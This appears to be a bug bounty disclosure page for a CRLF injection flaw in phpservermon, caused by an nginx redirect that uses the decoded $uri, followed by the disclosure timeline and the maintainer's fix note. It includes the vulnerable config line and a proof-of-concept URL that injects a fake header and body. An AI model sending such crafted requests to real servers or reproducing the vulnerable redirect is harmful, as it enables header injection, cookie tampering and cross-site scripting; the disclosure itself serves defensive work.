CRLF Injection in phpservermon/phpservermon

Valid

Reported on

Nov 19th 2021


Description

misconfig of nginx lead to crlf injection

In nginx, $uri is url decoded, which will decode %0d%0a to CRLF.

code:

return 301 http://<%= @server_name[0].gsub(/^www\./, '') %>$uri;

Proof of Concept

A request to:

http://www.test.com/%0d%0afake_header:123%0d%0a%0d%0afake_content

Impact

CRLF Injection allows an attacker to inject client-side malicious scripts (E.g. Cross site scripting) to disclose information. An attacker can gain sensitive information like CSRF token and allow the attacker to set fake cookies.

We are processing your report and will contact the phpservermon team within 24 hours. 2 months ago
We have contacted a member of the phpservermon team and are waiting to hear back 2 months ago
We have sent a follow up to the phpservermon team. We will try again in 7 days. 2 months ago
We have sent a second follow up to the phpservermon team. We will try again in 10 days. 2 months ago
We have sent a third and final follow up to the phpservermon team. This report is stale. 2 months ago
Tim Zandbergen validated this vulnerability 2 months ago
Dig2 has been awarded the disclosure bounty
The fix bounty is now up for grabs
Tim Zandbergen confirmed that a fix has been merged on 162bba 2 months ago
Tim Zandbergen has been awarded the fix bounty
Tim Zandbergen
2 months ago

Thanks for notifying. Fixed by removing PuPHPet and updating Vagrant. I would consider the scope of this vulnerability to be low because the Vagrant environment is meant for development only.